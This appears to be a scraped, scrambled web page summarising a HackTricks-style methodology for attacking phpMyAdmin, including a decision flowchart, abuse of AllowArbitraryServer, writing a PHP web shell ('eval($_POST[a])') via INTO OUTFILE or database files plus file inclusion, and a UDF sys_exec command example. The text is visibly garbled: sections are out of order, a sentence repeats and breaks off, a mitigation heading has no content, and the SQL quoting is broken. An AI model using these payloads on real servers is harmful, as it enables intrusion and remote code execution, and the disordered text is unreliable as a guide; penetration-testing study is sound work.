[Authenticated phpMyAdmin Session] │ ▼ Does 'secure_file_priv' allow writes? ├───► YES ───► Use 'INTO OUTFILE' ───► [Web Shell / RCE] │ └───► NO ────► Exploit LFI/RCE CVEs ───► [Session Poisoning / RCE]
If $cfg['AllowArbitraryServer'] = true is active in config.inc.php , an attacker can host a malicious MySQL server externally, input their own host IP into the phpMyAdmin login prompt, and authenticate against their own infrastructure to access the internal panel functionalities.
Understanding these paths can be useful for session hijacking or local file inclusion attacks. phpmyadmin hacktricks
If INTO OUTFILE is disabled and logging methods fail, writing a webshell into a database’s .frm or MYD file and including it via LFI is a viable fallback. Create a table with a webshell as a field value:
SELECT ‘<?php fputs(fopen(“a.php”,“w”),’<?php eval($_POST[a]);?>’); ?>’; If INTO OUTFILE is disabled and logging methods
A flaw allows an attacker to delete a configured server from the user's phpMyAdmin panel by tricking an authenticated administrator into clicking a malicious link. While not directly RCE, it can disrupt operations or be chained with other attacks. 4. Hardening and Mitigation Strategy
If the database user has write privileges ( FILE ) and the attacker can deduce or guess the absolute path of the web root directory (e.g., /var/www/html/ ), they can write a PHP web shell directly to the server. or /db .
-- Example UDF creation (Linux) CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so'; SELECT sys_exec('id > /tmp/output.txt');
This guide follows the HackTricks methodology for auditing and exploiting phpMyAdmin , a common web-based MySQL administration tool. 1. Initial Access & Authentication
If phpMyAdmin is not on the root directory, look for it using automated directory brute-forcing tools (like Gobuster or Dirsearch) with the following common paths: /phpmyadmin/ /pma/ /admin/phpMyAdmin/ /mysql/ /db/ 2. Authentication Bypass and Credential Hunting
Common paths include /phpmyadmin , /pma , /mysql , or /db .